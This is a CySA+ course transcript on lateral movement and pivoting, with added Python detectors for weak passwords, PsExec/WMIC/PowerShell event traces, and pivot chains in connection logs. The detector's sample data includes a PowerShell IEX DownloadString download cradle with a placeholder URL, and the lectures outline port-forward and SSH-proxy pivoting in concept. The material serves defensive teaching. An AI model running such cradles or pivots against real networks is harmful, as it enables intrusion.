CompTIA CYSA+ CS0-002 – Analyzing Lateral Movement and Pivoting IOCs Part 2

  1. Lateral Movement (OBJ 4.3)

Lateral movement. Now, we talked about lateral movement already, and I already provided a couple of examples or techniques that we can use for lateral movement as an attacker. If you’re working as a pen tester, things like pass the hash or a golden ticket attack. But there are other ones out there, too. And the idea is that an attacker can use any remote access protocol to move from host to host. One of the most common ways they do this is by relying on people using poor passwords. If you have employees in your organization, you can have employees that don’t follow good password practices. And the larger your organization, the more often this is going to be true.

For example, if we go forward and look at the top 30 passwords that are compromised, you’ll see that a lot of them are really kind of silly. For instance, who would set their password to 12345? Well, the reason that’s the number one most commonly hacked password is because a lot of people actually do it. And so if you have those people working in your organization, this can actually be something that can be a way that an attacker can laterally move throughout your organization by using different accounts on different machines, by going through some of these common passwords. For example, if you look there over on the third column, you’ll see one that looks pretty secure. Q-W-E-R-T-Y-U-I-O-P? Now, this one doesn’t look bad at first glance, but as you start looking at it, you see those letters look kind of familiar, even though they’re random.

Well, they’re actually the first line going across the top of your keyboard, and that’s why it’s a commonly used password. And so this is not secure, even though it doesn’t look like a standard dictionary word. Now let’s take a look at a couple more examples. As I went down the top 100 most commonly used passwords, I found two more that look pretty secure: number 42 and number 62. Number 42 looks pretty secure: Q one, W two, E three, R four, T five, Y six. Now, at first glance, that looks pretty secure. But if you look at your keyboard again, all they’re doing is what’s known as keyboard walking. They’re alternating between the Q row and the number row and going Q one, W two, E three all the way across. If you look at number 62, this one is doing the same thing but in reverse.

So again, just because it looks randomized doesn’t mean it is. And so you have to make sure that the passwords your employees are using are secure, because if they’re not using secure passwords, it’s a common way for an attacker to laterally move throughout your system. Now, insecure passwords are going to make our networks weak and much more susceptible to this lateral movement. So we want to make sure we’re doing frequent checks of our employees’ passwords using good tools as part of our security procedures. So again, remember, most systems rely on usernames and passwords for authentication. And if you’re using weak passwords, people are going to be able to break in. And when this is done with an administrator account, it’s really bad.
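The kind of password check just described can be automated. The script below is an added illustration, not part of the course material: it flags entries from a common-password list and the two keyboard-walk shapes shown in the lecture (a straight row like qwertyuiop, and the alternating q1w2e3r4t5y6 walk, forwards or in reverse). The password list and the sample accounts are constructed for the demonstration; a real audit would load a full breach list instead.

```python
"""Checks for the weak-password patterns the lecture describes: entries from a
common-password list and "keyboard walks" such as qwertyuiop or q1w2e3r4t5y6.
Added illustration, not part of the course material."""

# Constructed sample of a "top compromised passwords" list. A real audit
# would load a full breach list (hundreds of thousands of entries) instead.
COMMON_PASSWORDS = {"123456", "12345", "password", "qwerty", "qwertyuiop", "iloveyou"}

# US QWERTY rows, left to right; row index 0 is the number row.
KEYBOARD_ROWS = ("1234567890", "qwertyuiop", "asdfghjkl", "zxcvbnm")


def _key_position(ch):
    """Return (row, column) of a key, or None for characters not in the four rows."""
    for row, keys in enumerate(KEYBOARD_ROWS):
        if ch in keys:
            return row, keys.index(ch)
    return None


def is_keyboard_walk(password, min_len=6):
    """True when the password walks across the keyboard one column at a time.

    Covers the three shapes from the lecture: a straight row (qwertyuiop),
    a row alternated with the number row (q1w2e3r4t5y6), and the same walk
    run in reverse (6y5t4r3e2w1q). Vertical walks (qazwsx) are not covered.
    """
    chars = password.lower()
    if len(chars) < min_len:
        return False
    positions = [_key_position(c) for c in chars]
    if any(p is None for p in positions):
        return False
    cols = [col for _, col in positions]
    deltas = [b - a for a, b in zip(cols, cols[1:])]
    # A walk moves one column at a time in a single direction; a delta of 0
    # is the row switch in q1w2e3 (same column, different row).
    direction = next((d for d in deltas if d != 0), 0)
    if direction not in (1, -1):
        return False
    return all(d in (0, direction) for d in deltas)


def check_password(password):
    """Return the list of weaknesses found; an empty list means nothing was flagged."""
    findings = []
    if len(password) < 12:
        findings.append("too_short")
    if password.lower() in COMMON_PASSWORDS:
        findings.append("common_password")
    if is_keyboard_walk(password):
        findings.append("keyboard_walk")
    return findings


def audit(credentials):
    """Map each username to its findings, keeping only accounts that need attention."""
    report = {}
    for user, password in credentials.items():
        findings = check_password(password)
        if findings:
            report[user] = findings
    return report


if __name__ == "__main__":
    # Constructed sample accounts for the demonstration.
    sample = {
        "alice": "q1w2e3r4t5y6",
        "bob": "6y5t4r3e2w1q",
        "carol": "Correct-Horse-Battery-Staple-91",
        "dave": "12345",
    }
    for user, findings in audit(sample).items():
        print(f"{user}: {', '.join(findings)}")
```

In practice you would run this against password hashes recovered through an authorized audit (cracking the weak ones first) rather than against plaintext, and feed the flagged accounts into a forced reset; the walk detector is deliberately narrow so that it produces no false positives on ordinary words.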

All right, so let’s keep in mind that we need those secure passwords and we want to make sure they’re safe and secure. Now, if we move beyond that, what are some of the other lateral movement techniques that an attacker can use? Well, they can use the same things that system administrators use. That includes things like remote access services, WMIC, PsExec, and Windows PowerShell. Now, these are tools that a system administrator uses to do their job, but an attacker can use them for their nefarious purposes as well. First, let’s talk about remote access services. This is any combination of hardware and software that enables remote access to tools or information that typically reside on a network of IT devices.

Now, it’s a complicated way of saying this allows somebody to access a computer from a distance. Now, this can be really useful if you’re at home and you need to access your computer and be able to run something from the office even though you don’t have access to all the things. This might be something like a VPN or SSH or Telnet or other services like that. When you’re using things like SSH and Telnet and RDP and VNC, this can provide an attacker the ability to laterally move across the network. But they’re also useful for our users who need remote access. As I’m filming this right now, we’re actually in the middle of a worldwide pandemic and there are a lot more people working from home. And so remote access services are really needed right now.

But again, this becomes a major area of vulnerability that attackers will use against you and be able to laterally move around your network with. The second area we want to talk about is WMIC, which is the Windows Management Instrumentation Command Line. This provides users with a terminal interface and enables administrators to run scripts to manage those computers. Now, the great thing about WMIC as a system administrator is it gives you a lot of power. You can go forward and run scripts and run all sorts of different commands and perform tasks that require a higher level of privilege than normal. But again, if an attacker can get access to it, this becomes a great lateral movement tool for them.

Because they can run processes at higher levels of privilege than normal. They can also do crucial reconnaissance from a remote host. Using WMIC, they can do everything from looking at processes to disk partitions to BIOS data. All of this can be done through WMIC. And so it is a way that attackers use to laterally move throughout your network. Because of this, WMIC can be a vector in a post-attack lateral movement. The next one we want to talk about is PsExec. This is a tool that’s developed as an alternative to Telnet and other remote access services which utilizes the Windows system account for privilege escalation. Again, this is a tool that was developed for system administrators. It is actually part of the Sysinternals tool suite that was developed by Mark Russinovich.

Now again, this is something that was developed for system administrators, but attackers use it for their own benefit as well. This allows them to be able to open back doors, run processes, and elevate permissions across the network on remote systems and run things there. The final thing we want to talk about is Windows PowerShell. Now, Windows PowerShell is a task automation and configuration management framework from Microsoft, and it comes by default embedded in your Windows system. It consists of a command line shell and an associated scripting language. Because of that, it gives a lot of power to system administrators and in turn, attackers. Attackers also have developed their own exploit kits. One of the most popular ones is known as the PowerShell Empire.

This toolkit contains numerous prebuilt attack modules and it allows an attacker with ease to go forward and run lots of different programs against your systems with prewritten modules and prewritten exploits. So once you’ve exploited a system, you can then run PowerShell Empire on it and you’ll be able to run all of these different modules. For example, here you can see there are 91 currently loaded modules that I could run against the victim system because of the way PowerShell was developed. It has native cmdlets as well as the ability to run all sorts of different remote access, WMIC and PsExec tools inside of them as well through those PowerShell scripts. And you can even use these prebuilt modules from Empire as well. Bye.
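From the analyst’s side, each of the three tools the lecture just covered leaves a recognizable trace in Windows logs: PsExec installs a service named PSEXESVC on the remote host (System log event 7045), WMIC remote process creation shows the new process parented by WmiPrvSE.exe (Sysmon event 1), and PowerShell script block logging (event 4104) records download cradles of the kind Empire stagers use. The detector below is an added example, not course material; the event records and the field names are constructed to resemble a JSON export of Windows and Sysmon events rather than any one SIEM’s schema, and the URL in the sample is a placeholder.

```python
"""Flags the lateral-movement tooling the lecture lists (PsExec, WMIC and
remote PowerShell) in a stream of Windows event records, and ties each hit to
the network logon (4624, logon type 3) that preceded it on the same host.
Added example; the records and field names below are constructed."""

from collections import defaultdict

# Constructed sample events, one dict per log line (timestamps in seconds).
EVENTS = [
    {"ts": 100, "host": "HOST-B", "event_id": 4624, "logon_type": 3,
     "user": "CORP\\svc_backup", "src_ip": "10.0.1.5"},
    {"ts": 101, "host": "HOST-B", "event_id": 7045,
     "service_name": "PSEXESVC", "image_path": "C:\\Windows\\PSEXESVC.exe"},
    {"ts": 150, "host": "HOST-C", "event_id": 1,
     "image": "C:\\Windows\\System32\\cmd.exe",
     "parent_image": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe",
     "user": "CORP\\svc_backup"},
    {"ts": 200, "host": "HOST-D", "event_id": 4104,
     "script_block": "IEX (New-Object Net.WebClient)"
                     ".DownloadString('http://placeholder.invalid/stager')"},
    {"ts": 300, "host": "HOST-E", "event_id": 1,
     "image": "C:\\Windows\\System32\\notepad.exe",
     "parent_image": "C:\\Windows\\explorer.exe", "user": "CORP\\jsmith"},
]

# Children of WmiPrvSE.exe that are worth a look; interactive shells are the common case.
WMI_SUSPECT_CHILDREN = {"cmd.exe", "powershell.exe", "rundll32.exe"}


def _classify(event):
    """Return the rule name an event matches, or None if it is benign."""
    eid = event["event_id"]
    if eid == 7045:
        # PsExec's default remote service name; renamed copies need other rules.
        blob = (event.get("service_name", "") + event.get("image_path", "")).upper()
        if "PSEXESVC" in blob:
            return "psexec_service_install"
    if eid == 1 and event.get("parent_image", "").lower().endswith("\\wmiprvse.exe"):
        child = event.get("image", "").lower().rsplit("\\", 1)[-1]
        if child in WMI_SUSPECT_CHILDREN:
            return "wmi_remote_process"
    if eid == 4104:
        block = event.get("script_block", "").lower()
        if "downloadstring" in block or "invoke-expression" in block or "iex " in block or "iex(" in block:
            return "powershell_download_cradle"
    return None


def detect(events, window=60):
    """Return one finding per suspicious event.

    Each finding carries the (user, source IP) of a network logon seen on the
    same host within `window` seconds before it, which is the foothold the
    attacker moved from, or None when no such logon was recorded.
    """
    logons = defaultdict(list)  # host -> [(ts, user, src_ip)]
    for e in events:
        if e["event_id"] == 4624 and e.get("logon_type") == 3:
            logons[e["host"]].append((e["ts"], e["user"], e["src_ip"]))

    findings = []
    for e in events:
        rule = _classify(e)
        if rule is None:
            continue
        origin = next(((user, ip) for ts, user, ip in logons[e["host"]]
                       if 0 <= e["ts"] - ts <= window), None)
        findings.append({"host": e["host"], "ts": e["ts"], "rule": rule, "origin": origin})
    return findings


if __name__ == "__main__":
    for f in detect(EVENTS):
        print(f"{f['ts']:>5} {f['host']:<7} {f['rule']:<28} from {f['origin']}")
```

The correlation step is what turns a tool sighting into a lateral-movement story: the PsExec service install on HOST-B is tied back to the network logon from 10.0.1.5, so the analyst knows which host to examine next. The WMIC hit on HOST-C has no matching logon in the sample, which is exactly the gap that would send you to pull that host’s Security log.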

  1. Pivoting (OBJ 4.3)

Pivoting. Now, as I mentioned previously, there is a difference between pivoting and lateral movement. And so in this lesson we are going to focus on exactly what pivoting is and how it is distinctly different from lateral movement. Now, when we talk about pivoting, this is when an attacker uses a compromised host, the pivot, as a platform from which to spread an attack to other points in the network. When I talk more about lateral movement, this is more focused on when an attacker hops from one host to another in search of vulnerabilities for them to exploit. But once they start running those attacks from one point, that is the pivot point. Now, again, let me give you a quick word of warning here.

Lateral movement and pivoting, while they are different and we talk about them as separate concepts in this lesson, are used interchangeably by a lot of cybersecurity professionals. So when you’re talking about this in the field, people will say lateral movement or pivoting to mean the same thing oftentimes. But for the exam, there is a difference. And so you need to remember the difference really comes down to if you have an attack point established and then you’re conducting your attacks from that point in the network, that is your pivot point. And I’ll go into that a little bit more in this lesson. Now, when we do pivoting, one of the main things we have to do is we use port forwarding.

With port forwarding, this allows the attacker to use a host as a pivot, and then we’ll be able to access one of its open TCP ports to send traffic from this port to the port of another host on a different subnet. Now, I know that sounds a little complicated, so I’m going to go ahead and show you graphically what this means. First, we have a host. This is host A inside the victim network. As an attacker, I’m going to find some way to exploit host A through some kind of exploit. Maybe I used a phishing campaign or maybe I found a vulnerability that I was able to exploit with some kind of zero day code or something like that. However I got in, let’s just say host A has been had by an attacker and is now victimized. Then we have host B.

The attacker might be conducting reconnaissance and identifying another target. So as I got into host A, I now start looking around and identify there’s this other host B. This is my looking out as a way of looking forward as the lateral movement that I may want to achieve later. And then I keep searching and I find that there’s also this host C depicted here as a server. And so I have access to host A because I have control over it due to my initial exploitation. Then as part of my reconnaissance, I might find that I can reach host B, but I can’t reach host C because it’s on a different subnet. If this is the case, I may decide to exploit host B instead. By doing this, I now can have some kind of an exploit shell between host A and B. For instance, I may have gotten into host B and set up a listener on it and then had a netcat connection between host A and B.

Now, that doesn’t give me access to C yet, but I might be able to find that host B is on the same subnet as host C and has the ability to reach it because of its network configuration. For example, the firewall might trust host B but doesn’t trust host A, so host B can get into that subnet. Now, as the attacker, I want to be able to get into host C, so how can I do that? Well, maybe I’m going to set up a port forwarder on host B. For example, if I wanted to use RDP, the remote desktop protocol, I would set up a port forward on 3389 on host B that will forward port 3389 from B over to C. Now, I would have the ability from B to establish a connection, but that still won’t get it all the way back to host A.

Which is where I actually have my footprint. So I would want to set up a listener on host A for port 3389, which again is RDP. This way, anything received on host B for port 3389 will get forwarded from B over to C, and we’re going to use it as a pass through point or a pivot point. So now as an attacker, I can initiate an RDP session with host C from host A by going through host B, and essentially I’m playing a telephone game. Anything I send to B is going to get redirected to C, and anything that goes from C to B gets redirected back to A. And so we’re just passing through B on our way to C. This allows the attacker to successfully pivot from host A through host B into host C, and that way we have a full RDP connection ongoing.

Now, that’s the way it looks when you’re doing this inside of a network graphically. And again, this is a very simplified diagram, but it gives you the idea of going through one host to another, and we’re pivoting through that host by doing that port forwarding. In addition to that, we can do this. Instead of using RDP, we could use SSH. With SSH, it’s actually really easy to use it for pivoting because you can use the dash D flag, which sets up a local proxy and port forwarding on a given target. And so this is something that is used a lot by attackers. For instance, you might have again, host A, host B, and host C. Now, host A can’t get to host C because it’s being blocked by the firewall, but host B can get to host C.

So what will we do? Well, we’ll create an SSH tunnel between A to B, and then we’ll pivot from B through the firewall over to host C, creating that connection and allowing host A to connect to host C through host B. Now, in both of my examples I showed you where we used a single pivot point, but attackers can actually chain their proxy servers together in order to continue pivoting from host to host until they reach a mission-critical host or server. For example, in one network I worked in, we had a very complex network setup with multiple different subnets where only certain ones could trust each other. And we had an attacker that actually found their way through three or four different subnetworks, pivoting through until they got to the thing they were looking for.

For example, some networks may be built in a very complex manner, and you may have certain areas that are dedicated on certain subnets, like the accounting subnet, your credit card databases, maybe you have some ICS or SCADA that’s going to be on another network. And an attacker can actually pivot through multiple pivot points until they get into the particular networks they need to for the attack they’re trying to run. And so this is important to consider as people start chaining these proxy servers together to reach their end goal and into their end state.
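The A-to-B-to-C relay described above, and the chained version in the last two paragraphs, both have a network-level signature that an analyst can hunt for: the pivot host accepts a connection and, within a moment, opens a new one to a third host (on the same port for a plain port forward, on any port for an SSH dynamic proxy). The script below is an added example and not part of the course; the records are constructed in the shape of Zeek conn.log fields (ts, id.orig_h, id.resp_h, id.resp_p), and the IP addresses are placeholders for hosts A, B, C and two further hops.

```python
"""Hunts for pivot points in connection logs: a host that accepts a connection
and opens a new one to a third host within a short window, and chains of such
relays (A -> B -> C -> ...). Added example; the log below is constructed in the
shape of Zeek conn.log fields (ts, id.orig_h, id.resp_h, id.resp_p)."""

from collections import defaultdict

# Constructed sample. 10.0.1.5 is the attacker's foothold (host A), 10.0.1.20 is
# host B, 10.0.2.50 is server C. A second, deeper chain runs A -> B -> .40 -> .60,
# and unrelated traffic plus a non-relayed outbound connection are mixed in.
CONN_LOG = [
    (1000.0, "10.0.1.5", "10.0.1.20", 3389),   # A -> B on RDP
    (1000.4, "10.0.1.20", "10.0.2.50", 3389),  # B -> C on RDP, 0.4 s later (port forward)
    (1002.0, "10.0.1.7", "10.0.1.9", 445),     # unrelated SMB traffic
    (1100.0, "10.0.1.5", "10.0.1.20", 22),     # A -> B on SSH (dynamic proxy)
    (1100.3, "10.0.1.20", "10.0.3.40", 22),    # B -> next hop
    (1100.9, "10.0.3.40", "10.0.4.60", 3389),  # next hop -> final target, different port
    (1500.0, "10.0.1.20", "10.0.2.50", 3389),  # outbound with no inbound trigger: not a relay
]


def find_relays(conn_log, window=2.0):
    """Return (inbound, outbound) record pairs where the inbound's destination
    opens a connection to some third host within `window` seconds."""
    by_src = defaultdict(list)
    for rec in conn_log:
        by_src[rec[1]].append(rec)
    relays = []
    for inbound in conn_log:
        ts, src, dst, _ = inbound
        for outbound in by_src[dst]:
            o_ts, _, o_dst, _ = outbound
            # Exclude replies back to the origin and anything outside the window.
            if o_dst != src and 0 <= o_ts - ts <= window:
                relays.append((inbound, outbound))
    return relays


def pivot_chains(relays):
    """Follow relays whose outbound leg is another relay's inbound leg and return
    each complete path as a list of hosts, e.g. ["A", "B", "C"]."""
    next_hop = defaultdict(list)
    for inbound, outbound in relays:
        next_hop[inbound].append(outbound)
    outbound_legs = {outbound for _, outbound in relays}
    chains = []

    def walk(leg, path):
        extended = False
        for outbound in next_hop.get(leg, []):
            extended = True
            walk(outbound, path + [outbound[2]])
        if not extended:
            chains.append(path)

    # A chain starts at an inbound leg that is not itself the outbound leg of another relay.
    for inbound, _ in relays:
        if inbound not in outbound_legs:
            walk(inbound, [inbound[1], inbound[2]])
    return chains


def pivot_hosts(chains):
    """The intermediate hosts of every chain: these are the pivot points to investigate."""
    return {host for chain in chains for host in chain[1:-1]}


if __name__ == "__main__":
    relays = find_relays(CONN_LOG)
    for inbound, outbound in relays:
        kind = "port forward" if inbound[3] == outbound[3] else "proxy (port changes)"
        print(f"{inbound[1]} -> {inbound[2]} -> {outbound[2]}  [{kind}]")
    chains = pivot_chains(relays)
    print("chains:", chains)
    print("pivot hosts:", sorted(pivot_hosts(chains)))
```

The two-second window is deliberately tight so that the timing itself is the signal; a long-lived SSH session with a dynamic proxy would show as many short relays from the same B, which is why the chain step groups them by host rather than by individual connection. Pair this with the firewall-trust map from the lecture (which subnets can reach which) and a pivot host that sits between two trust zones is the first one to pull for forensics.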
